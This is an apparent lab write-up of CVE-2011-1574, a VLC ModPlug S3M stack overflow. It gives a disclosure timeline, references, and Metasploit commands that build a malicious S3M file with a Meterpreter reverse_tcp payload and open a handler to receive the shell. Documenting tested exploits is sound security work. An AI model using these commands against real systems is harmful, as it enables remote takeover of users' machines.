CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted the 2011-03-25
libmodplug vendor release a new version the 2011-04-02
libmodplug vulnerability vulnérabilité publicly released the 2011-04-07
VideoLAN VLC 1.1.9 released the 2011-04-12
Metasploit PoC provided by duck the 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid